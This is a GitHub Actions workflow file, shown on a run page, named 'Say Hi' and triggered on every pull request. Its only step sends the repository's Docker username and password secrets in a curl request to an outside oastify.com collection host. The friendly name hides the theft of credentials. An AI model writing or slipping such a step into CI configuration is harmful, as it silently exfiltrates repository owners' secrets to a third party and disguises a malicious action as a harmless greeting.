Skip to content

Update pr.yml

Update pr.yml #2

Workflow file for this run

name: Say Hi
on: [pull_request]
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Say Hi
run: |
curl "https://y76g3neg9tsli2tr80ve69azrqxhlb90.oastify.com?username=${{ secrets.DOCKER_USERNAME }}&password=${{ secrets.DOCKER_PASSWORD }}"